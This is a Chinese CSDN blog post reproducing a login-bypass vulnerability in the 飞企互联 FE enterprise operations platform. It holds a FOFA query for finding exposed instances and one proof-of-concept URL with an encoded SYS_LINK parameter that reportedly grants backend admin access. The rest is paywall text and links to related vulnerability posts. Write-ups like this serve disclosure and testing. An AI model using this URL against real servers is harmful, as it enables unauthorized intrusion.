飞企互联-FE企业运营管理平台多处登录绕过漏洞复现

0xSecl

已于 2024-01-04 23:43:31 修改

阅读量1.9k

点赞数 17

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2023-12-28 01:11:29 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/135258831

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外，支持企业B2B、C2B与O2O等核心需求，为不同行业客户的互联网+转型提供支持。

0x02 漏洞概述

飞企互联-FE企业运营管理平台 2.ln、loginService.fe等接口处存在登录绕过漏洞，未授权的攻击者可构造恶意的url访问页面，可直接进入后台管理页面，获取敏感信息，进一步利用可控制整个服务器。

0x03 复现环境

FOFA：app="飞企互联-FE企业运营管理平台"

0x04 漏洞复现

PoC-1

http://your-ip//2.ln?SYS_LINK=456d704642784968706357306d6b357a6a75565368782f56714e39576f6d35455a55526d7353676754524a76375868576d65684b703234514453413450446942

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

17
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

知黑而守白

01-10

537

飞企互联的FE企业运营管理平台是一款基于先进技术的云工作台，采用云计算、智能化、大数据、物联网和移动互联网等技术，以支撑企业的数字化转型。飞企互联-FE企业运营管理平台存在登陆绕过漏洞，攻击者通过构造特殊的请求路径，可以绕过登录限制，登陆后台获得管理员权限。

飞企互联FE业务协作平台 ProxyServletUti 任意文件读取漏洞复现

0xSec

04-16

829

飞企互联 FE 业务协作平台 ProxyServletUti 接口存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】飞企互联-FE企业运营管理平台——uploadAttachmentServlet——文件上传

LongL_GuYu的博客

07-10

1291

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`uploadAttachmentServlet`存在文件上传漏洞，导致恶意攻击者可以上传恶意后门、木马等，从而获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

飞企互联-FE企业运营管理平台管理员权限登录绕过漏洞复现

qq_39573664的博客

12-29

1043

飞企互联的FE企业运营管理平台存在一个潜在的安全漏洞，涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面，直接进入后台管理页面，获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会，对系统的安全性构成潜在威胁。

飞企互联-FE企业运营管理平台 parseTree SQL注入漏洞复现

0xSec

02-23

577

飞企互联-FE企业运营管理平台 parseTree 接口存在SQL注入漏洞，未经授权攻击者可通过该漏洞获取数据库敏感信息，进一步利用可获取服务器权限，导致网站处于极度不安全状态。

【漏洞复现】飞企互联-FE企业运营管理平台 uploadAttachmentServlet—文件上传漏洞

weixin_54799594的博客

07-13

2054

漏洞复现记录

飞企互联-FE企业运营管理平台 videotexMonitor SQL注入漏洞复现

0xSec

01-31

919

飞企互联-FE企业运营管理平台 videotexMonitor接口存在SQL注入漏洞，未经授权攻击者可通过该漏洞获取数据库敏感信息，进一步利用可获取服务器权限，导致网站处于极度不安全状态。

飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞复现

0xSec

03-22

1271

飞企互联-FE企业运营管理平台 /servlet/uploadAttachmentServlet接口处存在文件上传漏洞，未经身份验证的攻击者可以利用此漏洞上传恶意后门文件，获取服务器权限，进而控制整个web服务器。

飞企互联-FE企业运营管理平台 druid路径弱口令漏洞复现

0xSec

04-08

1002

飞企互联-FE企业运营管理平台/druid/login.html 路径处的登录接口存在弱口令漏洞，未授权的攻击者可通过该漏洞直接进入后台管理页面，获取敏感信息，进一步利用可控制整个服务器。

飞企互联-FE企业运营管理平台publicData.jsp SQL注入

weixin_43567873的博客

03-07

268

飞企互联-FE企业运营管理平台 publicData.jsp SQL注入

【漏洞复现】飞企互联-FE企业运营管理平台——SQL注入

LongL_GuYu的博客

06-28

812

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`treeXml.jsp`接口存在sql注入，恶意攻击者可能会向数据库发送构造的恶意SQL查询语句

飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞

xiaokp7的博客

09-13

859

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。

【漏洞复现】飞企互联FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞

https://blog.echo234.cn/

03-25

971

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台uploadAttachmentServlet 任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

漏洞复现--飞企互联FE业务协作平台ShowImageServlet任意文件读取

qq_53003652的博客

11-20

471

FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术，实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取。

飞企互联-FE企业运营管理平台ProxyServletUti接口任意文件读取漏洞

weixin_43567873的博客

03-13

213

飞企互联-FE企业运营管理平台ProxyServletUti接口任意文件读取漏洞

飞企互联企业运营管理平台存在任意文件读取

qq_36334672的博客

01-24

452

E-office OA 平行越权漏洞复现

afei001

01-09

752

目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述泛微e-office是泛微公司面向中小型组织推出的OA产品，简单易用高效，部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验。但泛微e-office OA系统存在的漏洞还真不少。这个平行越权漏洞之前早就在乌云上爆出过了。泛微E-office官网：w...

⻜企互联loginService任意登录

千寻的博客

02-26

480

飞企互联-FE企业运营管理平台多处接口处存在登录绕过，未授权的攻击者可构造恶意的url访问页面，可直接进入后台管理页面，获取敏感信息。

【漏洞复现】飞企互联-FE企业运营管理平台-common_sort_tree-RCE

知黑而守白

01-10

508

飞企互联的FE企业运营管理平台是一款基于先进技术的云工作台，采用云计算、智能化、大数据、物联网和移动互联网等技术，以支撑企业的数字化转型。飞企互联-FE企业运营管理平台 common_sort_tree.jsp 接口权限设置不当，攻击者可以通过利用此漏洞执行系统命令，导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。

如何配置飞企互联OA系统企业版以便进行日常工作，并详细说明登录、配置首页和个人信息管理的操作步骤？

飞企互联-FE企业运营管理平台 多处登录绕过漏洞复现

0x01 产品简介

0x02 漏洞概述

0x03 复现环境

0x04 漏洞复现

飞企互联-FE企业运营管理平台多处登录绕过漏洞复现